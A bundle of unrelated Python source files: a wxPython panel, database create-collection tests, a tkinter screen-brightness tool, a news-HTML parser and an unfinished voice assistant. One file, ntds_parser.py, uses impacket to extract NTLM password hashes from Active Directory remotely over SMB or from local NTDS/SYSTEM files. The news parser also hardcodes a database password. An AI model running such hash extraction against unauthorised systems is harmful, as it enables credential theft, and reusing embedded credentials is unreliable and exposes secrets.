#sz.Add(szradius, (2, 1), (1, 1), wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
sz.Add(self.widgets['radius'], (2, 1), (1, 1),
wx.ALIGN_CENTER_VERTICAL|wx.FIXED_MINSIZE|wx.ALIGN_RIGHT)
label = wx.StaticText(self, -1, 'm')
sz.Add(label, (2, 2), (1, 1), wx.ALIGN_CENTER_VERTICAL)
label = wx.StaticText(self, -1, 'Max size:')
sz.Add(label, (3, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
sz.Add(self.widgets['max size'], (3, 1), (1, 1),
wx.ALIGN_CENTER_VERTICAL|wx.EXPAND)
label = wx.StaticText(self, -1, 'Max targets:')
sz.Add(label, (4, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
sz.Add(self.widgets['max targets'], (4, 1), (1, 1),
wx.ALIGN_CENTER_VERTICAL|wx.EXPAND)
label = wx.StaticText(self, -1, 'Overlap:')
sz.Add(label, (5, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
sz.Add(self.widgets['overlap'], (5, 1), (1, 1),
wx.ALIGN_CENTER_VERTICAL|wx.FIXED_MINSIZE|wx.ALIGN_RIGHT)
label = wx.StaticText(self, -1, '%')
sz.Add(label, (5, 2), (1, 1), wx.ALIGN_CENTER_VERTICAL)
label = wx.StaticText(self, -1, 'Mosaic Center:')
sz.Add(label, (6, 0), (1, 1), wx.ALIGN_CENTER_VERTICAL)
sz.Add(self.widgets['mosaic center'], (6, 1), (1, 1),
wx.ALIGN_CENTER_VERTICAL|wx.FIXED_MINSIZE|wx.ALIGN_RIGHT)
sz.Add(self.widgets['ignore request'], (7, 0), (1, 3), wx.ALIGN_CENTER_VERTICAL)
sz.AddGrowableCol(1)
return sz
if __name__ == '__main__':
class App(wx.App):
def OnInit(self):
frame = wx.Frame(None, -1, 'Mosaic Target Maker Test')
panel = Panel(frame, 'Test')
frame.Fit()
self.SetTopWindow(frame)
frame.Show()
return True
app = App(0)
app.MainLoop()
|
test_create_collection.py
|
import pdb
import copy
import logging
import itertools
import time
import threading
from multiprocessing import Process
import sklearn.preprocessing
import pytest
from utils import *
from constants import *
uid = "create_collection"
class TestCreateCollection:
"""
******************************************************************
The following cases are used to test `create_collection` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_single_filter_fields()
)
def get_filter_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_single_vector_fields()
)
def get_vector_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_segment_row_limits()
)
def get_segment_row_limit(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_collection_fields(self, connect, get_filter_field, get_vector_field):
'''
target: test create normal collection with different fields
method: create collection with diff fields: metric/field_type/...
expected: no exception raised
'''
filter_field = get_filter_field
logging.getLogger().info(filter_field)
vector_field = get_vector_field
collection_name = gen_unique_str(uid)
fields = {
"fields": [gen_primary_field(), filter_field, vector_field],
# "segment_row_limit": default_segment_row_limit
}
logging.getLogger().info(fields)
connect.create_collection(collection_name, fields)
assert connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def _test_create_collection_segment_row_limit(self, connect, get_segment_row_limit):
'''
target: test create normal collection with different fields
method: create collection with diff segment_row_limit
expected: no exception raised
'''
collection_name = gen_unique_str(uid)
fields = copy.deepcopy(default_fields)
# fields["segment_row_limit"] = get_segment_row_limit
connect.create_collection(collection_name, fields)
assert connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_collection_after_insert(self, connect, collection):
'''
target: test insert vector, then create collection again
method: insert vector and create collection
expected: error raised
'''
# pdb.set_trace()
connect.insert(collection, default_entity)
try:
connect.create_collection(collection, default_fields)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "Create collection failed: meta table add collection failed,error = collection %s exist" % collection
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_collection_after_insert_flush(self, connect, collection):
'''
target: test insert vector, then create collection again
method: insert vector and create collection
expected: error raised
'''
connect.insert(collection, default_entity)
# connect.flush([collection])
try:
connect.create_collection(collection, default_fields)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "Create collection failed: meta table add collection failed,error = collection %s exist" % collection
# TODO: assert exception
@pytest.mark.tags(CaseLabel.L2)
def test_create_collection_without_connection(self, dis_connect):
'''
target: test create collection, without connection
method: create collection with correct params, with a disconnected instance
expected: error raised
'''
collection_name = gen_unique_str(uid)
with pytest.raises(Exception) as e:
dis_connect.create_collection(collection_name, default_fields)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_collection_existed(self, connect):
'''
target: test create collection but the collection name have already existed
method: create collection with the same collection_name
expected: error raised
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
try:
connect.create_collection(collection_name, default_fields)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "Create collection failed: meta table add collection failed,error = collection %s exist" % collection_name
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_after_drop_collection(self, connect, collection):
'''
target: create with the same collection name after collection dropped
method: delete, then create
expected: create success
'''
connect.drop_collection(collection)
time.sleep(2)
connect.create_collection(collection, default_fields)
@pytest.mark.tags(CaseLabel.L2)
def test_create_collection_multithread(self, connect):
'''
target: test create collection with multithread
method: create collection using multithread,
expected: collections are created
'''
threads_num = 8
threads = []
collection_names = []
def create():
collection_name = gen_unique_str(uid)
collection_names.append(collection_name)
connect.create_collection(collection_name, default_fields)
for i in range(threads_num):
t = MyThread(target=create, args=())
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
for item in collection_names:
assert item in connect.list_collections()
connect.drop_collection(item)
class TestCreateCollectionInvalid(object):
"""
Test creating collections with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_metric_types()
)
def get_metric_type(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_segment_row_limit(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_dim(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_invalid_string(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_field_types()
)
def get_field_type(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def _test_create_collection_with_invalid_segment_row_limit(self, connect, get_segment_row_limit):
collection_name = gen_unique_str()
fields = copy.deepcopy(default_fields)
fields["segment_row_limit"] = get_segment_row_limit
with pytest.raises(Exception) as e:
connect.create_collection(collection_name, fields)
@pytest.mark.tags(CaseLabel.L2)
def test_create_collection_with_invalid_dimension(self, connect, get_dim):
dimension = get_dim
collection_name = gen_unique_str()
fields = copy.deepcopy(default_fields)
fields["fields"][-1]["params"]["dim"] = dimension
with pytest.raises(Exception) as e:
connect.create_collection(collection_name, fields)
@pytest.mark.tags(CaseLabel.L2)
def test_create_collection_with_invalid_collection_name(self, connect, get_invalid_string):
collection_name = get_invalid_string
with pytest.raises(Exception) as e:
connect.create_collection(collection_name, default_fields)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("collection_name", ('', None))
def test_create_collection_with_empty_or_None_collection_name(self, connect, collection_name):
# collection_name = ''
try:
connect.create_collection(collection_name, default_fields)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "Collection name should not be empty"
@pytest.mark.tags(CaseLabel.L2)
def test_create_collection_no_dimension(self, connect):
'''
target: test create collection with no dimension params
method: create collection with correct params
expected: create status return ok
'''
collection_name = gen_unique_str(uid)
fields = copy.deepcopy(default_fields)
fields["fields"][-1]["params"].pop("dim")
try:
connect.create_collection(collection_name, fields)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "dimension is not defined in field type params"
@pytest.mark.tags(CaseLabel.L2)
def _test_create_collection_no_segment_row_limit(self, connect):
'''
target: test create collection with no segment_row_limit params
method: create collection with correct params
expected: use default default_segment_row_limit
'''
collection_name = gen_unique_str(uid)
fields = copy.deepcopy(default_fields)
fields.pop("segment_row_limit")
connect.create_collection(collection_name, fields)
res = connect.get_collection_info(collection_name)
logging.getLogger().info(res)
assert res["segment_row_limit"] == default_server_segment_row_limit
# TODO: assert exception
@pytest.mark.tags(CaseLabel.L2)
def test_create_collection_limit_fields(self, connect):
collection_name = gen_unique_str(uid)
limit_num = 64
fields = copy.deepcopy(default_fields)
for i in range(limit_num):
field_name = gen_unique_str("field_name")
field = {"name": field_name, "type": DataType.INT64}
fields["fields"].append(field)
try:
connect.create_collection(collection_name, fields)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "maximum field's number should be limited to 64"
# TODO: assert exception
@pytest.mark.tags(CaseLabel.L2)
def test_create_collection_invalid_field_name(self, connect, get_invalid_string):
collection_name = gen_unique_str(uid)
fields = copy.deepcopy(default_fields)
field_name = get_invalid_string
field = {"name": field_name, "type": DataType.INT64}
fields["fields"].append(field)
with pytest.raises(Exception) as e:
connect.create_collection(collection_name, fields)
# TODO: assert exception
@pytest.mark.tags(CaseLabel.L2)
def test_create_collection_invalid_field_type(self, connect, get_field_type):
collection_name = gen_unique_str(uid)
fields = copy.deepcopy(default_fields)
field_type = get_field_type
field = {"name": "test_field", "type": field_type}
fields["fields"].append(field)
with pytest.raises(Exception) as e:
connect.create_collection(collection_name, fields)
|
screenControl.py
|
import screen_brightness_control as sbc
import time
from tkinter import *
from utility import *
import threading
import json
from tkinter.font import Font
from time import strftime
def fadeBrightness(fadeTo, interval = 0.5, increment = 1):
current = sbc.get_brightness()[0]
if fadeTo == current:
return False
if fadeTo < current:increment = -increment
def fadingProcess():
for i in range(current, fadeTo, increment):
sbc.set_brightness(i)
time.sleep(interval)
return True
t1 = threading.Thread(target = fadingProcess)
t1.start()
return t1
def adjustBrightness():
brightness = sum(bounds)/2
sbc.set_brightness(brightness)
brightnessShow["text"] = f"{brightness}%"
if brightnessCheckCompleted():
return endBrightnessCheck()
return brightness
def brightnessCheckCompleted():
return bounds[1] - bounds[0] < 5
def restart():
bounds[0], bounds[1] = [5, 95]
adjustBrightness()
def endBrightnessCheck():
brightness = round(sum(bounds)/2, 2)
endScreen = Frame(win, bg = "black")
endScreen.place(x = 0, y = 0, width = wu*100, height = hu*100)
title = Label(endScreen, text = "Test Completed", font = ("", calculateFontSize(wu*100, hu*25)), fg = "white", bg = "black")
title.place(x = 0, y = 0, height = hu*25, width = wu*100)
description = f"""
The screen brightness test is now completed.
your average brightness is now set to {brightness}%.
you can retake the test now or go back to the home
screen. Remember you can always take the test and
change your average brightness later.
"""
showDescription = Label(endScreen, text = description, font = ("", int(calculateFontSize(wu*100, hu*55)/2)), justify = "left")
showDescription.place(x = 0, y = hu*25, width = wu*100, height = 55*hu)
# Write the data in a json file
dataToWrite = {"ScreenControl":{
"averageBrightness":str(brightness),
"controllingBrightness":True,
"currentBrightness":str(brightness),
"startTime":"08:00",
"endTime":"22:00"
}}
modifyUserActivity(dataToWrite)
def restartQuiz():
restart()
endScreen.place_forget()
buttonsWidth, buttonsHeight = 30*wu, 10*hu
backButton = assistButton(endScreen, "Go Back", win.quit, buttonsWidth, buttonsHeight)
restartButton = assistButton(endScreen, "Restart The quiz", restartQuiz, buttonsWidth, buttonsHeight)
backButton.place(x = 10*wu, width = buttonsWidth, y = 85*hu, height = buttonsHeight)
restartButton.place(x = 60*wu, width = buttonsWidth, y = 85*hu, height = buttonsHeight)
def about(mainRoot = None, wu = None , hu = None):
aboutScreen = Frame(mainRoot, bg = "black")
aboutScreen.place(x = 0, y = 0, width = wu*100, height = hu*100)
title = Label(aboutScreen, text = "About This Test", font = ("", calculateFontSize(wu*100, hu*25)), fg = "white", bg = "black")
title.place(x = 0, y = 0, height = hu*25, width = wu*100)
description = f"""
Everyone has different screens, different lighting and different eye strain levels etc. So, there is a test which is done
in order to find the most optimal average screen brightness for you. REMEMBER THAT THIS IS ONLY THE
AVERAGE BRIGHTNESS, so the brightness will still be regulated by PAFAT in order to give you the best
experience, like dimming the lights on nights for better sleep etc. However, this test will give PAFAT a baseline of
your favorable brightness. It works by setting the brightness at 50% and then you select if the brightness is too dim
or too bright. Based on that PAFAT changes the brightness until you come up with your optimal brightness. If you
feel that a certain brightness is perfect then you can finalize the brightness or you could keep clicking if the
brightness is too dim or too bright. After a few clicks PAFAT will understand what your optimal brightness is(even if
you haven't finalized it by clicking the finalize button). It does this because getting to extreme precision is not
required. It just wants to know a rough estimate of a brightness that you are comfortable with. Once PAFAT thinks
that it is done then it automatically stops the test and finalizes the result. Remember that you can always take this
test and change your average brightness whenever you want. It also requires your morning and night time in order to know
when to start dimming the lights etc. It sets a default morning and night time however you can change it any time you want.
If you don't want to use this feature then you can turn it off any time.
"""
showDescription = Label(aboutScreen, text = description, font = ("", int(calculateFontSize(wu*90, hu*50)/3)), justify = "left")
showDescription.place(x = 5*wu, y = hu*20, width = wu*90, height = 50*hu)
backButton = assistButton(aboutScreen, "Quit and go back", aboutScreen.place_forget, 70*wu, hu*15)
backButton.place(x = 15*wu, width = 70*wu, y = 75*hu, height = 15*hu)
def testScreenBrightness(root, WIDTH, HEIGHT):
def dimFunc():
bounds[0] = sum(bounds)/2 + 1
adjustBrightness()
def brightFunc():
bounds[1] = sum(bounds)/2 - 1
adjustBrightness()
global win, wu, hu, bounds, brightnessShow
wu = WIDTH/100
hu = HEIGHT/100
bounds = [5, 95]
background = "#0080ff"
win = Frame(root, bg = background)
win.place(x = 0, y = 0, width = WIDTH, height = HEIGHT)
title = Label(win, text = "Screen Brightness Test", font = ("", calculateFontSize(wu*100, hu*25)), fg = "white", bg = "black")
title.place(x = 0, y = 0, height = hu*25, width = wu*100)
brightnessShow = Label(win, text = "50%", font = ("", calculateFontSize(WIDTH, hu*6)), bg = background, fg = "black")
brightnessShow.place(x = 0, y = hu*30, width = WIDTH, height = hu*6)
adjustBrightness()
upperButtonsWidth = wu*40 ; upperButtonsHeight = hu*15
lowerButtonsWidth = wu*90 ; lowerButtonsHeight = hu*15
dimButton = standardButton(win, "Too Dim", dimFunc, upperButtonsWidth, upperButtonsHeight)
brightButton = standardButton(win, "Too Bright", brightFunc, upperButtonsWidth, upperButtonsHeight)
completedButton = standardButton(win, "Finalize Brightness", endBrightnessCheck, lowerButtonsWidth, lowerButtonsHeight)
dimButton.place(x = wu*5, y = hu*40, width = upperButtonsWidth, height = upperButtonsHeight)
brightButton.place(x = wu*55, y = hu*40, width = upperButtonsWidth, height = upperButtonsHeight)
completedButton.place(x = wu*5, y = hu*60, width = lowerButtonsWidth, height = lowerButtonsHeight)
backButton = assistButton(win, "Quit and go back", win.quit)
restartButton = assistButton(win, "Restart Test", restart)
aboutButton = assistButton(win, "How does this work?", lambda : about(win, wu, hu))
backButton.place(x = 5*wu, width = 25*wu, y = 85*hu, height = 10*hu)
aboutButton.place(x = 36.5*wu, width = 27*wu, y = 85*hu, height = 10*hu)
restartButton.place(x = 70*wu, width = 25*wu, y = 85*hu, height = 10*hu)
win.mainloop()
def changeData(userDataLabel):
startTime, endTime, brightnessControl = startTimeDropBox.get(), endTimeDropBox.get(), brightnessControlVar.get()
dataToOverWrite = {
"startTime":startTime,
"endTime":endTime,
"controllingBrightness":bool(brightnessControl)
}
userActivity = getUserActivity()
userActivity["ScreenControl"] = userActivity["ScreenControl"] | dataToOverWrite
modifyUserActivity(userActivity)
refreshUserActivity(userDataLabel)
def refreshUserActivity(userDataLabel):
with open("userActivity.json", "r") as f:
userData = dict(json.load(f))["ScreenControl"]
dataToShow = f"""
Average Brightness
{userData["averageBrightness"]}%
Control Brightness
{"on" if userData["controllingBrightness"] else "off"}
Current Brightness
{userData["currentBrightness"]}%
Start Time
{userData["startTime"]}
End Time
{userData["endTime"]}
"""
userDataLabel['text'] = dataToShow
def updateActionInputs():
data = dict(getUserActivity())["ScreenControl"]
startTimeIdx = times.index(data["startTime"])
endTimeIdx = times.index(data["endTime"])
startTimeDropBox.current(startTimeIdx)
endTimeDropBox.current(endTimeIdx)
brightnessControlVar.set(int(data["controllingBrightness"]))
def showAndControlData(root, WIDTH, HEIGHT, wu, hu):
def retakeQuiz():
try:
temp = Frame(root, bg = "white")
temp.place(x = 0, y = 0, width = WIDTH, height = HEIGHT)
testScreenBrightness(temp, WIDTH, HEIGHT)
temp.place_forget()
showAndControlData(root, WIDTH, HEIGHT, wu, hu)
except Exception:pass
global startTimeDropBox, endTimeDropBox, brightnessControlVar, times
root.config(bg = "black")
heading = Label(root, text = "Screen Control", font = ( "", int(calculateFontSize(WIDTH, hu*20) * 1.5)), fg = "black", bg = "#bdbdbd")
heading.place(x = 0, y = 0, width = WIDTH, height = hu*20)
userDataLabel = Label(root, font = ("", calculateFontSize(30*wu, 70*hu)), bg = "#a8ceff", justify = "left")
userDataLabel.place(x = 2*wu, y = 25*hu, height = 70*hu, width = 30*wu)
refreshUserActivity(userDataLabel)
#AF stands for Action Frame
AFWIDTH = 63*wu
AFHEIGHT = 70*hu
afwu = AFWIDTH/100
afhu = AFHEIGHT/100
actionFrameBackground = "#00dea6"
actionFrame = Frame(root, bg = actionFrameBackground)
actionFrame.place(x = 35*wu, y = 25*hu, height = AFHEIGHT, width = AFWIDTH)
times = [f"{i if i >= 10 else f'0{i}'}:{j if j != 0 else '00'}" for i in range(0, 24) for j in range(0, 60, 15)]
dropBoxWidth, dropBoxHeight = afwu * 90, afhu*10
actionHeading = Label(actionFrame, text = "Change Settings", font = ("", calculateFontSize(afwu*100, afhu*10)))
actionHeading.place(x = 0, y = 0, width = 100*afwu, height = 10*afhu)
dropBoxHeading = Label(actionFrame, text = """Change your morning and night time by the dropbox below""", font = ("", int(calculateFontSize(afwu*100, afhu*5)/2)))
dropBoxHeading.place(x = 0, y = 15*afhu, width = 100*afwu, height = 5*afhu)
startTimeDropBox = createDropBox(actionFrame, times, "Blue", "Black", calculateFontSize(dropBoxWidth, dropBoxHeight))
startTimeDropBox.place(x = afwu*5, y = afhu*25, width = dropBoxWidth, height = dropBoxHeight)
endTimeDropBox = createDropBox(actionFrame, times, "Blue", "Black", calculateFontSize(dropBoxWidth, dropBoxHeight))
endTimeDropBox.place(x = afwu*5, y = afhu*40, width = dropBoxWidth, height = dropBoxHeight)
actionHeading = Label(actionFrame, text = "Control Brightness :", font = ("", int(calculateFontSize(afwu*25, afhu*10)*2.3)), bg = actionFrameBackground, fg = "dark blue", justify = "left")
actionHeading.place(x = afwu*5, y = 55*afhu, width = 25*afwu, height = 10*afhu)
brightnessControlVar, brightnessControlCheckBox = createSlidingCheckButton(actionFrame, afwu * 20, afhu*10, 0)
brightnessControlCheckBox.place(y = 55*afhu, x = afwu*31, height = afhu*10)
submitButton = standardButton(actionFrame, "Submit", lambda : changeData(userDataLabel), fontSize = calculateFontSize(afwu*35, afhu*10)*2)
submitButton.place(y = 55*afhu, x = 60*afwu, width = afwu*35, height = afhu * 10)
backButton = RoundedButton(actionFrame, actionFrameBackground, afwu*25, afhu*25, "Go Back", calculateFontSize(afwu*25, afhu*25)*2, root.place_forget)
backButton.place(x = 5*afwu, y = 70*afhu)
backButton = RoundedButton(actionFrame, actionFrameBackground, afwu*30, afhu*25, "Retake The Quiz", calculateFontSize(afwu*25, afhu*25)*2, retakeQuiz)
backButton.place(x = 35*afwu, y = 70*afhu)
aboutButton = RoundedButton(actionFrame, actionFrameBackground, afwu*25, afhu*25, "How it Works", calculateFontSize(afwu*25, afhu*25)*2, lambda : about(root, wu, hu))
aboutButton.place(x = 70*afwu, y = 70*afhu)
font = Font(family = "Helvetica", size = int(calculateFontSize(dropBoxWidth, dropBoxHeight) * 2 / 3))
root.option_add("*TCombobox*Listbox*Font", font)
updateActionInputs()
root.mainloop()
def calculateCurrentInterval(percentageIntervals):
currentTimeInMinutes = int(strftime("%H")) * 60 + int(strftime("%M"))
if currentTimeInMinutes < percentageIntervals[0] or currentTimeInMinutes > percentageIntervals[-1]:
return None
bounds = []
for i in range(1, 10):
if percentageIntervals[i - 1] <= currentTimeInMinutes <= percentageIntervals[i]:
bounds = [i - 1, i]
calculateBoundDistances = lambda x : abs(percentageIntervals[x] - currentTimeInMinutes)
boundsDistances = [calculateBoundDistances(x) for x in bounds]
return bounds[boundsDistances.index(min(boundsDistances))]
def setCurrentBrightness(averageBrightness, interval):
brightnessRange = 5
brightnessRanges = [i for i in range(averageBrightness - brightnessRange, averageBrightness + brightnessRange, 1)]
intervalToBrightness = {
1:10,
2:7,
3:5,
4:5,
5:9,
6:7,
7:4,
8:6,
9:4,
10:2
}
currentBrightnessPercentage = brightnessRanges[intervalToBrightness[interval + 1] - 1]
userActivity = getUserActivity()
userActivity["ScreenControl"]["currentBrightness"] = str(currentBrightnessPercentage)
modifyUserActivity(userActivity)
return fadeBrightness(currentBrightnessPercentage, 1)
def calculatePercentageIntervals(startTime, endTime):
startTimeInMinutes, endTimeInMinutes = [
int(startTime[:startTime.find(":")]) * 60 + int(startTime[startTime.find(":") + 1:]),
int(endTime[:endTime.find(":")]) * 60 + int(endTime[endTime.find(":") + 1:])
]
timeToAlterBrightness = endTimeInMinutes - startTimeInMinutes
percentageIntervals = []
percentageInterval = timeToAlterBrightness // 10
for partition in range(10):
percentageIntervals.append(percentageInterval * partition + startTimeInMinutes)
return percentageIntervals
def mainScreenBrightnessControl():
while True:
try:
data = getUserActivity()["ScreenControl"]
if not data["controllingBrightness"]:
time.sleep(10)
percentageIntervals = calculatePercentageIntervals(data["startTime"], data["endTime"])
timeToWait = (percentageIntervals[1] - percentageIntervals[0]) * 2
currentPercentageInterval = calculateCurrentInterval(percentageIntervals)
if currentPercentageInterval is None:
averageBrightness = int(float(data["averageBrightness"]))
fadeBrightness(averageBrightness, 1)
time.sleep(timeToWait)
setCurrentBrightness(int(float(data["averageBrightness"])), currentPercentageInterval)
time.sleep(timeToWait)
# print("h", timeToWait)
except Exception as e:
time.sleep(10)
def main(root, WIDTH, HEIGHT, wu, hu):
takeScreenTest = True
if getUserActivity():
with open("userActivity.json", "r") as f:
dataOfActivity = json.load(f)
takeScreenTest = not "ScreenControl" in dataOfActivity
if takeScreenTest:
testScreenBrightness(root, WIDTH, HEIGHT)
else:
showAndControlData(root, WIDTH, HEIGHT, wu, hu)
root.place_forget()
# import ctypes
# ctypes.windll.shcore.SetProcessDpiAwareness(2)
# root = Tk()
# root.geometry("2500x1500");root.title("H")
# testScreenBrightness(root, 2500, 1500)
# root.mainloop()
# mainScreenBrightnessControl()
|
ntds_parser.py
|
import sys, re, itertools, time
from binascii import hexlify
from threading import Thread, Event
from impacket.examples.secretsdump import LocalOperations, RemoteOperations, NTDSHashes
from impacket.smbconnection import SMBConnection, SessionError
from socket import error as socket_error
def process_remote(username, password, target, historic):
hashes = list()
print("Attempting to connect to {}...".format(target))
try:
connection = SMBConnection(target, target)
connection.login(username, password, "", "", "")
ops = RemoteOperations(connection, False, None)
ops.setExecMethod("smbexec")
stopper = Event()
spinner = Thread(target=__update, args=(stopper, hashes))
spinner.start()
NTDSHashes(None, None, isRemote=True, remoteOps=ops, noLMHash=True, useVSSMethod=False,
justNTLM=True, printUserStatus=True, history=historic, lastLogon=True, pwdLastSet=True,
perSecretCallback=lambda type, secret: hashes.append(__process_hash(secret))).dump()
stopper.set()
spinner.join()
if len(hashes) == 0:
raise Exception("Extraction seemingly finished successfully but I didn't find any hashes...")
return __get_domain(hashes), hashes
except socket_error:
raise Exception("Failed to connect to {}".format(target))
except SessionError as e:
if e.error == 3221225581:
raise Exception("Username or password incorrect - please try again.")
def process_local(system, ntds, historic):
hashes = list()
print("Attempting to grab decryption key...")
ops = LocalOperations(system)
try:
bootKey = ops.getBootKey()
except:
raise Exception("Failed to retrieve decryption key. Ensure your SYSTEM hive is correct.")
#print("Found key: 0x{0}.".format(hexlify(bootKey)))
stopper = Event()
spinner = Thread(target=__update, args=(stopper, hashes))
spinner.start()
NTDSHashes(ntds, bootKey, noLMHash=ops.checkNoLMHashPolicy(), useVSSMethod=True, justNTLM=True,
printUserStatus=True, history=historic, lastLogon=True, pwdLastSet=True,
perSecretCallback=lambda type, secret: hashes.append(__process_hash(secret))).dump()
stopper.set()
spinner.join()
return __get_domain(hashes), hashes
def __process_hash(hash):
user, rid, lmhash, nthash, pwdLastSet, enabled, lastLogon = re.findall("(?P<user>.*):(?P<rid>.*):(?P<lmhash>.*):(?P<ntlmhash>.*):::(?:(?: \(pwdLastSet=(?P<pwdLastSet>.*)\))(?: \(status=(?P<enabled>.*)\))(?: \(lastLogon=(?P<lastLogon>.*)\)))?", hash)[0]
history_match = re.match("(?P<user>.*)(_history\d+$)", user)
if history_match:
user = history_match.group(1)
return {"username": user.strip(), "ntlmhash": nthash, "historic": True}
else:
return {"username": user.strip(), "ntlmhash": nthash, "enabled": True if enabled == "Enabled" else False, "passwordLastSet": pwdLastSet, "lastLogon": lastLogon}
def __get_domain(hashes):
return [hash["username"].split("\\")[0] for hash in hashes if "\\" in hash["username"]][0]
def __update(stopper, hashes):
spinner = itertools.cycle(['-', '/', '|', '\\'])
#if not stopper.is_set():
sys.stdout.write("[" + spinner.next() + "] (" + str(len(hashes)) + ") Finding and extracting hashes - this might take a few minutes... \r")
sys.stdout.flush()
#time.sleep(0.2)
|
process.py
|
import multiprocessing
from bs4 import BeautifulSoup, NavigableString, Comment
from lib.common import connectDB, oidList, log, strToDate, sectionName
import sys
import time
host = 'mongodb://user:eDltjgus2004!@192.168.35.153'
chunk = 500
maxProcessNo = 8
def parseNews(oid, processNo, parsedNo, startTime):
while 1:
try:
log('Process oid=%03d started.' % oid, 0, 0, 0)
newsDB, categoryDB, newsRawDB = connectDB(host)
while 1:
li = list(newsRawDB[str(oid)].find().limit(chunk))
if len(li) == 0:
return
log('Got %d Data from DB at oid=%03d' % (len(li), oid), startTime, processNo,
parsedNo.value)
removeLi = []
processedNews = []
categoryDict = dict()
for news in li:
try:
removeLi.append({'_id': news['_id']})
aid, body, summary = news['aid'], news['body'], news['summary']
summarySoup = BeautifulSoup(summary['summary'], 'html.parser')
summaryText = summarySoup.get_text()
newsText = ""
newsSoup = BeautifulSoup(body, 'html.parser')
bodyEl = newsSoup.find(id="articleBodyContents")
for i in bodyEl:
if type(i) is NavigableString:
newsText += i
elif type(i) is Comment:
pass
else:
if i.name == 'br':
newsText += '\n'
if i.get('data-type') == 'ore':
newsText += i.get_text()
newsText = newsText.replace('\n\n', '\n')
newsText = newsText.replace('\n', ' ')
newsText = newsText.replace(' ', ' ')
newsText = newsText.strip().decode('utf-8','ignore').encode("utf-8")
newsTitle = newsSoup.find(id="articleTitle").get_text().strip()
category = []
for i in newsSoup.find_all("em", {"class": "guide_categorization_item"}):
category.append(sectionName[i.get_text()])
if sectionName[i.get_text()] not in categoryDict:
categoryDict[sectionName[i.get_text()]] = []
categoryDict[sectionName[i.get_text()]].append({
'oid': oid,
'aid': aid
})
publishTime = strToDate(newsSoup.find_all("span", {"class": "t11"})[0].get_text())
if len(newsSoup.find_all("span", {"class": "t11"})) == 2:
editedTime = strToDate(newsSoup.find_all("span", {"class": "t11"})[1].get_text())
else:
editedTime = strToDate(newsSoup.find_all("span", {"class": "t11"})[0].get_text())
processedNews.append({
'newsId': aid,
'title': newsTitle,
'body': newsText,
'summary': summaryText,
'category': category,
'publishTime': publishTime,
'editedTime': editedTime
})
except:
pass
for section, data in categoryDict.items():
categoryDB[section].insert_many(data)
if len(processedNews) > 0:
newsDB[str(oid)].insert_many(processedNews)
parsedNo.value += len(processedNews)
log('Parsed %03d objects in DB at oid=%03d' % (len(processedNews), oid), startTime, processNo,
parsedNo.value)
for remove in removeLi:
newsRawDB[str(oid)].delete_one(remove)
log('Dropped %03d objects in RAW at oid=%03d' % (chunk, oid), startTime, processNo,
parsedNo.value)
except:
pass
if __name__ == '__main__':
multiprocessing.freeze_support()
log('Parser main process started.', time.time(), 0, 0)
thrs = []
cnt = 0
processNo = len(oidList)
parsedNo = multiprocessing.Value('i', 0)
startTime = time.time()
for i in oidList:
if cnt >= processNo:
break
thr = multiprocessing.Process(target=parseNews, args=(i, processNo, parsedNo, startTime))
thrs.append(thr)
thr.start()
cnt += 1
for i in thrs:
i.join()
|
main.py
|
import datetime
import os # os module is used to open files and run commands on the cmd and a lot of other features installation:deafult by python
import webbrowser
import cv2
import pyautogui
import pyttsx3 # pyttsx3 is module for text to speech installation:pip install pyttsx3
import requests
# speechrecogntion is the module which is used for recognizing audio and converting into text installation:pip install speechrecogntion
import speech_recognition as sr
from pyttsx3.drivers import sapi5
import functools
from Feature import *
hour = datetime.datetime.now().hour
class HoverAssist:
def __init__(self) -> None:
self.hour = int(datetime.datetime.now().hour)
self.engine = pyttsx3.init()
self.voices = self.engine.getProperty('voices')
self.engine.setProperty('voice', self.voices[0].id)
def speak(self, audio):
self.engine.say(audio)
print(" ")
print(f"Hover Said: {audio}")
self.engine.runAndWait()
self.engine.stop()
def listen(self):
while True:
listener = sr.Recognizer()
try:
with sr.Microphone() as source:
audio = listener.listen(source, timeout=1.0)
response = listener.recognize_google(audio)
response = response.lower()
if "hawa" in response or "how" in response:
self.speak("How can I help you?")
self.Analyze()
else:
pass
except sr.WaitTimeoutError:
pass
except sr.UnknownValueError:
pass
except sr.RequestError:
print("Network error.")
def takecommand(self):
listener = sr.Recognizer()
